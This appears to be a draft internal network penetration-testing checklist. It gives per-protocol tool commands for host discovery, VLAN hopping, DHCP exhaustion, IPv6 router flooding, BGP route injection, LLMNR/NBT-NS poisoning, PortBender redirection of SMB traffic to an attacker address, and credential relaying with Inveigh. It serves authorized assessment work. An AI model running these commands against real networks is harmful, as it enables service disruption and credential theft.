Internal Network Assessment (WIP)

---

Ethernet Testing (802.3)

---

• Test wired network communications and identify active devices.

nmap

# Perform a ping sweep to identify live hosts
nmap -sn 192.168.1.0/24

apr-scan

# Discover devices using ARP scanning
arp-scan --interface=eth0 192.168.1.0/24

netdiscover

# Passive discovery of hosts on the subnet
netdiscover -r 192.168.1.0/24

---

VLAN Testing (802.1Q)

---

• Detect VLAN segmentation flaws and potential VLAN hopping vulnerabilities.

vlan-hopper

# Attempt VLAN hopping attacks
vlan-hopper --interface=eth0

nmap

# Scan for devices across VLANs
nmap -Pn -V -T4 192.168.1.0/24

---

PNAC Testing (802.1X)

---

• Assess network access control mechanisms and identify bypass techniques.

responder

# Capture authentication attempts
responder -I eth0

eapmd5pass

# Test EAP-MD5 authentication brute-force
eapmd5pass -i eth0 -u <username>

---

STP Testing (802.1D)

---

• Identify weaknesses in Spanning Tree Protocol (STP).

yersinia

# Launch Yersinia in interactive mode
yersinia -I

BPDU Injection

# Inject malicious STP BPDU packets

---

Local IP Protocols

---

• Assess weaknesses in local IP-based protocols.

Protocols Tested: DHCP, PXE, LLMNR/NBT-NS/mDNS, WPAD

responder

# Capture LLMNR/NBT-NS/mDNS requests
responder -I eth0

dhcpig

# Perform a DHCP exhaustion attack
dhcpig -i eth0

---

Internal Routing Protocols

---

• Identify vulnerabilities in internal routing protocols.

Protocols Tested: HSRP, VRRP, RIP, EIGRP, OSPF

yersinia

# Exploit HSRP/VRRP vulnerabilities using Yersinia
yersinia -I

Scapy

# Craft custom OSPF packets using Scapy
TODO

---

IPv6 Testing

---

• Discover IPv6-enabled hosts and assess security weaknesses.

nmap

# Perform an IPv6 ping sweep
nmap -6 -sn fe80::/64

thc-ipv6

# Flood IPv6 routers with spoofed addresses
flood_router26

---

BGP / iBGP Testing - To Review

---

• Assess exposure or misconfiguration of BGP sessions within internal routing (iBGP) environments.

nmap

# Scan for open BGP port (TCP 179)
nmap -p 179 <target>

tcpdump

# Capture BGP session traffic
tcpdump -ni eth0 port 179

ExaBGP / GoBGP (Lab/Sim Only)

# Simulate BGP peering and inject/receive BGP routes
# Requires controlled environment and BGP-capable target

Lab-Based or Advanced Scenarios:

ExaBGP (route injection simulation)

# Define a custom BGP session and announce routes (lab only)
exabgp exabgp.conf

Sample exabgp.conf

neighbor 10.0.0.1 {
  router-id 10.0.0.2;
  local-address 10.0.0.2;
  local-as 65001;
  peer-as 65001;
  static {
    route 192.168.100.0/24 next-hop 10.0.0.2;
  }
}

Things to validate:

• Is TCP 179 accessible internally without filtering?
• Are iBGP sessions authenticated (MD5)?
• Are there any rogue BGP speakers allowed?
• Are prefix-lists and route filters applied?
• Can a rogue peer inject routes into the iBGP mesh?
• Is there route reflector logic that could propagate malicious prefixes?

---

L2/L3 Segregation Evasion & Poisoning - To Review

---

• Assess poisoning and credential capture techniques across segmented or proxied environments (e.g., behind RRAS, NAT, or L3 boundaries).

Context: Responder and similar tools often fail in segmented networks due to lack of broadcast visibility (LLMNR/NBT-NS/mDNS), or because traffic cannot naturally reach the attacker’s box. Some techniques to overcome this include NAT-based traps, active relay attacks, and TCP redirection.

PortBender

# Hijack an existing listening port and redirect to attacker (e.g., SMB/445)
PortBender.exe add -p 445 -r <attacker_ip> -rp 445

Inveigh (PowerShell)

# Run Inveigh with elevated privileges to poison and capture hashes
Invoke-Inveigh -NBNS Y -mDNS Y -LLMNR Y -HTTP Y -ConsoleOutput Y

Inveigh-Relay (C# or PowerShell)

# Relay captured credentials to target services (e.g., SMB/RDP/LDAP)
Invoke-InveighRelay -Target 10.0.0.5 -SMBRelay Y

Responder (when NAT rule or direct trigger is available)

# Standard LLMNR/NBT-NS/mDNS poisoning (not functional across routed networks by default)
responder -I eth0

Things to consider:

• Can you use PortBender to redirect traffic from trusted services to the attacker?
• Is traffic NAT’d or routed to you explicitly? Can you trigger this via a phishing payload or internal tooling?
• Is the poisoning tool (e.g., Inveigh/Responder) positioned in the right segment to see broadcasts or receive direct hits?
• Would relaying be possible post-capture (e.g., to LDAP/SMB/RDP)?